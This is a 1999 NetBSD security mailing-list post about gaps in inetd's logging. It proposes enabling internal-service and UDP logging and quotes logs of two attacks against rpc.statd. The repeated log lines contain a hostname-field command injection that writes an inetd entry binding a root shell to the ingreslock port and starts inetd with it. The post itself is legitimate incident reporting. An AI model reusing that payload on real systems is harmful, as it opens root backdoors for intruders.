tech-security: several poorly documented limitations of inetd's "-l" option

Subject: several poorly documented limitations of inetd's "-l" option
To: NetBSD Security Technical Discussion List <tech-security@NetBSD.ORG>
From: Greg A. Woods <woods@most.weird.com>
List: tech-security
Date: 04/18/1999 17:37:35
Last night there were two separate (by time), but seemingly identical,
scans/attacks of at least some of the machines on my network.
Interestingly the only log entries were from NetBSD 1.3.2 and 1.3.1
systems, without a peep from my 1.3.3 or 1.3I machines, nor from the
BSDI box or any other devices, so far as I can tell (though not all the
non-unix devices do as much logging as might be desirable).  So far it
looks like the attack was unsuccessful too.

Unfortunately even though I run "inetd -l" there's no trace of where
these connections came from because oddly enough inetd doesn't log UDP
connections, at all.  Now I do understand enough about RPC to know that
some RPC requests will usually appear to come from the server host
because they've been forwarded by the portmap daemon, but that doesn't
mean I don't want them logged too (and of course I'd like to see them
logged by portmap as well, which is why I back-ported libwrap support to
my 1.3.3 portmap).  In this case I don't think the requests were
forwarded by portmap though because otherwise the other newer portmap
daemons on my network would also likely have seen the request and thus
logged it, but that's not the issue.

As I hint above, the hosts where rcp.statd logged these incidents were
the hosts where I had not yet installed the latest portmapper that also
supports libwrap logging.  I'm not sure how a remote attacker could have
figured that out, but it would seem on first glance that's exactly what
they did do.  (I have what has been to date a successful IP Filter rule
on some of my systems that will block and log any attempts to use nmap
or queso to identify the target host, but these rules were not
triggered, so I'm not sure how any kind of stealf probe would have
identified which portmap daemon I'm running.)

I also noticed that the inetd code offers to log connections to
internally implemented services, but only if LIBWRAP_INTERNAL was
defined, and this feature is not enabled by default.  Although not many
people use these services, I'm sure anyone running "inetd -l" would
assume they are logged as I did before I looked at the code.  I suspect
this "feature" was not enabled by default because whomever implemented
had some misguided goals for improving performance.  Even if I did want
superior performance for internal services, I never ever want to give up
logging for performance, especially when I've explicitly turned on what
would seem to be logging for *all* services (it's not documented as
otherwise!).

I'd like to recommend that inetd's LIBWRAP_INTERNAL be eliminated and
merged with LIBWRAP so that it's on whenever logging is enabled.  I'd
also like to recommend that logging be done by inetd for all UDP
requests too, perhaps alternately controlled by a separate option
appended to another field such as "{wait,nowait}[,log]".

I've already enabled LIBWRAP_INTERNAL in my makefiles, and I may also
try to find the time to implement at least full logging, if not a
per-entry logging option too (but I don't want let that stop anyone else
from working on a similar fix too!).

Here is the entire set of log entries for your enjoyment (but of course
this is *not* an "invitation" to play with my machines without prior
approval!):

Apr 18 04:28:49 most rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:49 most rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:50 most rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:50 most rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &

Apr 18 04:28:51 very rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:51 very rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:51 very rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:51 very rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &

Apr 18 04:28:51 always rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:51 always rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:52 always rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:52 always rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &


And then again the attack repeats at 09:54 EST:

Apr 18 09:54:07 most rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:07 most rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:07 most rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:07 most rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &

Apr 18 09:54:08 very rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:08 very rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:08 very rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:08 very rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &

Apr 18 09:54:09 always rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:09 always rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:10 always rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:10 always rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &

-- 
							Greg A. Woods

+1 416 218-0098      VE3TCP      <gwoods@acm.org>      <robohack!woods>
Planix, Inc. <woods@planix.com>; Secrets of the Weird <woods@weird.com>